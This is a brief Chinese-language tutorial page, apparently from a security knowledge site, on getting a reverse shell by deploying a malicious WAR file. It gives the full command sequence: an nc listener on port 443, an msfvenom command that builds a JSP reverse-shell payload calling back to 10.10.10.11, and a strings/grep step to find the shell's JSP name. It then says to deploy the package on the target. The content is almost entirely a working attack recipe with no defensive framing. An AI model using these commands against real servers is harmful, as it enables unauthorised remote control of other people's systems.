menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 011-反弹shell chevron_right 016-War文件反弹shell.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    016-War文件反弹shell.md
    405 B / 2021-07-17 00:01:40
        # War文件反弹shell
    
    首先在本地监听TCP协议443端口
    
    ```
    nc -lvp 443
    
    ```
    
    使用如下命令生成war文件:
    
    ```bash
    msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.11 LPORT=443 -f war > reverse.war
    
    ```
    
    查看war包中shell的jsp文件名
    
    ```bash
    strings reverse.war | grep jsp
    
    ```
    
    在靶机上部署war包后,访问shell的jsp文件,即可在监听端口获得反弹shell
    
    
    
    links
    file_download